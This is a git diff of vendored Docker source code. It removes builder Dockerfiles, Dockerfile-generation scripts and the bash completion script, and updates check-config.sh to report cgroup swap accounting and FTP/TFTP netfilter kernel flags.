libltdl-dev # for pkcs11 "ltdl.h" - libseccomp-dev # for "seccomp.h" & "libseccomp.so" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - libsystemd-dev - vim-common # tini dep - ) - - case "$suite" in - # s390x needs libseccomp 2.3.1 - xenial) - # Ubuntu Xenial has libseccomp 2.2.3 - runcBuildTags="apparmor selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor selinux seccomp" - ;; - esac - - # update and install packages - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> 
"$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile deleted file mode 100644 index 6d7e4c574b..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! -# - -FROM s390x/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config libsystemd-dev vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md deleted file mode 100644 index 5f2e888c7a..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md +++ /dev/null @@ -1,5 +0,0 @@ -# `dockercore/builder-rpm` - -This image's tags contain the dependencies for building Docker `.rpm`s for each of the RPM-based platforms Docker targets. 
- -To add new tags, see [`contrib/builder/rpm/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/rpm/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh deleted file mode 100755 index 558f7ee0db..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-rpm:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile deleted file mode 100644 index 1f841631ca..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
-# - -FROM centos:7 - -RUN yum groupinstall -y "Development Tools" -RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs -RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile deleted file mode 100644 index af040c5c9f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
-# - -FROM fedora:24 - -RUN dnf -y upgrade -RUN dnf install -y @development-tools fedora-packager -RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile deleted file mode 100644 index 98e57a9c4b..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM fedora:25 - -RUN dnf -y upgrade -RUN dnf install -y @development-tools fedora-packager -RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh deleted file mode 100755 index 6f93afafa3..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh +++ /dev/null @@ -1,189 +0,0 @@ -#!/bin/bash -set -e - -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all 
Dockerfiles in this directory -# or: ./generate.sh centos-7 -# to only update centos-7/Dockerfile -# or: ./generate.sh fedora-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - distro="${version%-*}" - suite="${version##*-}" - from="${distro}:${suite}" - installer=yum - - if [[ "$distro" == "fedora" ]]; then - installer=dnf - fi - if [[ "$distro" == "photon" ]]; then - installer=tdnf - fi - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! - # - - FROM $from - EOF - - echo >> "$version/Dockerfile" - - extraBuildTags='pkcs11' - runcBuildTags= - - case "$from" in - oraclelinux:6) - # We need a known version of the kernel-uek-devel headers to set CGO_CPPFLAGS, so grab the UEKR4 GA version - # This requires using yum-config-manager from yum-utils to enable the UEKR4 yum repo - echo "RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4" >> "$version/Dockerfile" - echo "RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - ;; - fedora:*) - echo "RUN ${installer} -y upgrade" >> "$version/Dockerfile" - ;; - *) ;; - esac - - case "$from" in - centos:*) - # get "Development Tools" packages dependencies - echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" - - if [[ "$version" == "centos-7" ]]; then - echo 'RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs' >> "$version/Dockerfile" - fi - ;; - oraclelinux:*) - # get "Development Tools" packages and dependencies - # we also need yum-utils for 
yum-config-manager to pull the latest repo file - echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" - ;; - opensuse:*) - # get rpm-build and curl packages and dependencies - echo 'RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build' >> "$version/Dockerfile" - ;; - photon:*) - echo "RUN ${installer} install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils" >> "$version/Dockerfile" - ;; - *) - echo "RUN ${installer} install -y @development-tools fedora-packager" >> "$version/Dockerfile" - ;; - esac - - packages=( - btrfs-progs-devel # for "btrfs/ioctl.h" (and "version.h" if possible) - device-mapper-devel # for "libdevmapper.h" - glibc-static - libseccomp-devel # for "seccomp.h" & "libseccomp.so" - libselinux-devel # for "libselinux.so" - libtool-ltdl-devel # for pkcs11 "ltdl.h" - pkgconfig # for the pkg-config command - selinux-policy - selinux-policy-devel - sqlite-devel # for "sqlite3.h" - systemd-devel # for "sd-journal.h" and libraries - tar # older versions of dev-tools do not have tar - git # required for containerd and runc clone - cmake # tini build - vim-common # tini build - ) - - case "$from" in - oraclelinux:7) - # Enable the optional repository - packages=( --enablerepo=ol7_optional_latest "${packages[*]}" ) - ;; - esac - - case "$from" in - oraclelinux:6) - # doesn't use systemd, doesn't have a devel package for it - packages=( "${packages[@]/systemd-devel}" ) - ;; - esac - - # opensuse & oraclelinx:6 do not have the right libseccomp libs - case "$from" in - opensuse:*|oraclelinux:6) - packages=( "${packages[@]/libseccomp-devel}" ) - runcBuildTags="selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="seccomp selinux" - ;; - esac - - case "$from" in - opensuse:*) - packages=( "${packages[@]/btrfs-progs-devel/libbtrfs-devel}" ) - packages=( "${packages[@]/pkgconfig/pkg-config}" ) - packages=( 
"${packages[@]/vim-common/vim}" ) - if [[ "$from" == "opensuse:13."* ]]; then - packages+=( systemd-rpm-macros ) - fi - - # use zypper - echo "RUN zypper --non-interactive install ${packages[*]}" >> "$version/Dockerfile" - ;; - photon:*) - packages=( "${packages[@]/pkgconfig/pkg-config}" ) - echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" - ;; - *) - echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" - ;; - esac - - echo >> "$version/Dockerfile" - - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - case "$from" in - oraclelinux:6) - # We need to set the CGO_CPPFLAGS environment to use the updated UEKR4 headers with all the userns stuff. - # The ordering is very important and should not be changed. 
- echo 'ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - ;; - *) ;; - esac - - -done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile deleted file mode 100644 index addd431508..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
-# - -FROM opensuse:13.2 - -RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build -RUN zypper --non-interactive install libbtrfs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim systemd-rpm-macros - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 selinux -ENV RUNC_BUILDTAGS selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile deleted file mode 100644 index c34d3046dd..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile +++ /dev/null @@ -1,28 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
-# - -FROM oraclelinux:6 - -RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4 -RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek - -RUN yum groupinstall -y "Development Tools" -RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 selinux -ENV RUNC_BUILDTAGS selinux - -ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile deleted file mode 100644 index 378536b647..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
-# - -FROM oraclelinux:7 - -RUN yum groupinstall -y "Development Tools" -RUN yum install -y --enablerepo=ol7_optional_latest btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile deleted file mode 100644 index b77d573d9f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! 
-# - -FROM photon:1.0 - -RUN tdnf install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils -RUN tdnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/check-config.sh b/vendor/github.com/docker/docker/contrib/check-config.sh index d07e4ce368..88eb8aa753 100755 --- a/vendor/github.com/docker/docker/contrib/check-config.sh +++ b/vendor/github.com/docker/docker/contrib/check-config.sh @@ -217,9 +217,13 @@ echo 'Optional Features:' check_flags CGROUP_PIDS } { + CODE=${EXITCODE} check_flags MEMCG_SWAP MEMCG_SWAP_ENABLED - if is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then - echo " $(wrap_color '(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")' bold black)" + if [ -e /sys/fs/cgroup/memory/memory.memsw.limit_in_bytes ]; then + echo " $(wrap_color '(cgroup swap accounting is currently enabled)' bold black)" + EXITCODE=${CODE} + elif is_set MEMCG_SWAP && ! 
is_set MEMCG_SWAP_ENABLED; then + echo " $(wrap_color '(cgroup swap accounting is currently not enabled, you can enable it by setting boot option "swapaccount=1")' bold black)" fi } { @@ -293,6 +297,8 @@ echo ' - "'$(wrap_color 'ipvlan' blue)'":' check_flags IPVLAN | sed 's/^/ /' echo ' - "'$(wrap_color 'macvlan' blue)'":' check_flags MACVLAN DUMMY | sed 's/^/ /' +echo ' - "'$(wrap_color 'ftp,tftp client in container' blue)'":' +check_flags NF_NAT_FTP NF_CONNTRACK_FTP NF_NAT_TFTP NF_CONNTRACK_TFTP | sed 's/^/ /' # only fail if no storage drivers available CODE=${EXITCODE} diff --git a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS deleted file mode 100644 index 03ee2dde3d..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS +++ /dev/null @@ -1,2 +0,0 @@ -Tianon Gravi (@tianon) -Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/bash/docker b/vendor/github.com/docker/docker/contrib/completion/bash/docker deleted file mode 100644 index 7ea5d9a9f4..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/bash/docker +++ /dev/null @@ -1,4282 +0,0 @@ -#!/bin/bash -# -# bash completion file for core docker commands -# -# This script provides completion of: -# - commands and their options -# - container ids and names -# - image repos and tags -# - filepaths -# -# To enable the completions either: -# - place this file in /etc/bash_completion.d -# or -# - copy this file to e.g. ~/.docker-completion.sh and add the line -# below to your .bashrc after bash completion features are loaded -# . ~/.docker-completion.sh -# -# Configuration: -# -# For several commands, the amount of completions can be configured by -# setting environment variables. 
-# -# DOCKER_COMPLETION_SHOW_CONTAINER_IDS -# DOCKER_COMPLETION_SHOW_NETWORK_IDS -# DOCKER_COMPLETION_SHOW_NODE_IDS -# DOCKER_COMPLETION_SHOW_PLUGIN_IDS -# DOCKER_COMPLETION_SHOW_SECRET_IDS -# DOCKER_COMPLETION_SHOW_SERVICE_IDS -# "no" - Show names only (default) -# "yes" - Show names and ids -# -# You can tailor completion for the "events", "history", "inspect", "run", -# "rmi" and "save" commands by settings the following environment -# variables: -# -# DOCKER_COMPLETION_SHOW_IMAGE_IDS -# "none" - Show names only (default) -# "non-intermediate" - Show names and ids, but omit intermediate image IDs -# "all" - Show names and ids, including intermediate image IDs -# -# DOCKER_COMPLETION_SHOW_TAGS -# "yes" - include tags in completion options (default) -# "no" - don't include tags in completion options - -# -# Note: -# Currently, the completions will not work if the docker daemon is not -# bound to the default communication port/socket -# If the docker daemon is using a unix socket for communication your user -# must have access to the socket for the completions to function correctly -# -# Note for developers: -# Please arrange options sorted alphabetically by long name with the short -# options immediately following their corresponding long form. -# This order should be applied to lists, alternatives and code blocks. - -__docker_previous_extglob_setting=$(shopt -p extglob) -shopt -s extglob - -__docker_q() { - docker ${host:+-H "$host"} ${config:+--config "$config"} 2>/dev/null "$@" -} - -# __docker_containers returns a list of containers. Additional options to -# `docker ps` may be specified in order to filter the list, e.g. -# `__docker_containers --filter status=running` -# By default, only names are returned. -# Set DOCKER_COMPLETION_SHOW_CONTAINER_IDS=yes to also complete IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. 
-__docker_containers() { - local format - if [ "$1" = "--id" ] ; then - format='{{.ID}}' - shift - elif [ "$1" = "--name" ] ; then - format='{{.Names}}' - shift - elif [ "${DOCKER_COMPLETION_SHOW_CONTAINER_IDS}" = yes ] ; then - format='{{.ID}} {{.Names}}' - else - format='{{.Names}}' - fi - __docker_q ps --format "$format" "$@" -} - -# __docker_complete_containers applies completion of containers based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_containers`. -__docker_complete_containers() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_containers "$@")" -- "$current") ) -} - -__docker_complete_containers_all() { - __docker_complete_containers "$@" --all -} - -__docker_complete_containers_running() { - __docker_complete_containers "$@" --filter status=running -} - -__docker_complete_containers_stopped() { - __docker_complete_containers "$@" --filter status=exited -} - -__docker_complete_containers_unpauseable() { - __docker_complete_containers "$@" --filter status=paused -} - -__docker_complete_container_names() { - local containers=( $(__docker_q ps -aq --no-trunc) ) - local names=( $(__docker_q inspect --format '{{.Name}}' "${containers[@]}") ) - names=( "${names[@]#/}" ) # trim off the leading "/" from the container names - COMPREPLY=( $(compgen -W "${names[*]}" -- "$cur") ) -} - -__docker_complete_container_ids() { - local containers=( $(__docker_q ps -aq) ) - COMPREPLY=( $(compgen -W "${containers[*]}" -- "$cur") ) -} - -__docker_images() { - local images_args="" - - case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in - all) - images_args="--no-trunc -a" - ;; - non-intermediate) - images_args="--no-trunc" - ;; - esac - - local repo_print_command - if [ "${DOCKER_COMPLETION_SHOW_TAGS:-yes}" = "yes" ]; then - repo_print_command='print $1; print $1":"$2' - else - repo_print_command='print $1' 
- fi - - local awk_script - case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in - all|non-intermediate) - awk_script='NR>1 { print $3; if ($1 != "") { '"$repo_print_command"' } }' - ;; - none|*) - awk_script='NR>1 && $1 != "" { '"$repo_print_command"' }' - ;; - esac - - __docker_q images $images_args | awk "$awk_script" | grep -v '$' -} - -__docker_complete_images() { - COMPREPLY=( $(compgen -W "$(__docker_images)" -- "$cur") ) - __ltrim_colon_completions "$cur" -} - -__docker_complete_image_repos() { - local repos="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1 }')" - COMPREPLY=( $(compgen -W "$repos" -- "$cur") ) -} - -__docker_complete_image_repos_and_tags() { - local reposAndTags="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1; print $1":"$2 }')" - COMPREPLY=( $(compgen -W "$reposAndTags" -- "$cur") ) - __ltrim_colon_completions "$cur" -} - -# __docker_networks returns a list of all networks. Additional options to -# `docker network ls` may be specified in order to filter the list, e.g. -# `__docker_networks --filter type=custom` -# By default, only names are returned. -# Set DOCKER_COMPLETION_SHOW_NETWORK_IDS=yes to also complete IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -__docker_networks() { - local format - if [ "$1" = "--id" ] ; then - format='{{.ID}}' - shift - elif [ "$1" = "--name" ] ; then - format='{{.Name}}' - shift - elif [ "${DOCKER_COMPLETION_SHOW_NETWORK_IDS}" = yes ] ; then - format='{{.ID}} {{.Name}}' - else - format='{{.Name}}' - fi - __docker_q network ls --format "$format" "$@" -} - -# __docker_complete_networks applies completion of networks based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_networks`. 
-__docker_complete_networks() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_networks "$@")" -- "$current") ) -} - -__docker_complete_containers_in_network() { - local containers=$(__docker_q network inspect -f '{{range $i, $c := .Containers}}{{$i}} {{$c.Name}} {{end}}' "$1") - COMPREPLY=( $(compgen -W "$containers" -- "$cur") ) -} - -# __docker_volumes returns a list of all volumes. Additional options to -# `docker volume ls` may be specified in order to filter the list, e.g. -# `__docker_volumes --filter dangling=true` -# Because volumes do not have IDs, this function does not distinguish between -# IDs and names. -__docker_volumes() { - __docker_q volume ls -q "$@" -} - -# __docker_complete_volumes applies completion of volumes based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_volumes`. -__docker_complete_volumes() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_volumes "$@")" -- "$current") ) -} - -# __docker_plugins_bundled returns a list of all plugins of a given type. -# The type has to be specified with the mandatory option `--type`. -# Valid types are: Network, Volume, Authorization. -# Completions may be added or removed with `--add` and `--remove` -# This function only deals with plugins that come bundled with Docker. -# For plugins managed by `docker plugin`, see `__docker_plugins_installed`. 
-__docker_plugins_bundled() { - local type add=() remove=() - while true ; do - case "$1" in - --type) - type="$2" - shift 2 - ;; - --add) - add+=("$2") - shift 2 - ;; - --remove) - remove+=("$2") - shift 2 - ;; - *) - break - ;; - esac - done - - local plugins=($(__docker_q info | sed -n "/^Plugins/,/^[^ ]/s/ $type: //p")) - for del in "${remove[@]}" ; do - plugins=(${plugins[@]/$del/}) - done - echo "${plugins[@]} ${add[@]}" -} - -# __docker_complete_plugins_bundled applies completion of plugins based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# The plugin type has to be specified with the next option `--type`. -# This function only deals with plugins that come bundled with Docker. -# For completion of plugins managed by `docker plugin`, see -# `__docker_complete_plugins_installed`. -__docker_complete_plugins_bundled() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_plugins_bundled "$@")" -- "$current") ) -} - -# __docker_plugins_installed returns a list of all plugins that were installed with -# the Docker plugin API. -# By default, only names are returned. -# Set DOCKER_COMPLETION_SHOW_PLUGIN_IDS=yes to also complete IDs. -# For built-in pugins, see `__docker_plugins_bundled`. -__docker_plugins_installed() { - local fields - if [ "$DOCKER_COMPLETION_SHOW_PLUGIN_IDS" = yes ] ; then - fields='$1,$2' - else - fields='$2' - fi - __docker_q plugin ls | awk "NR>1 {print $fields}" -} - -# __docker_complete_plugins_installed applies completion of plugins that were installed -# with the Docker plugin API, based on the current value of `$cur` or the value of -# the optional first option `--cur`, if given. -# For completion of built-in pugins, see `__docker_complete_plugins_bundled`. 
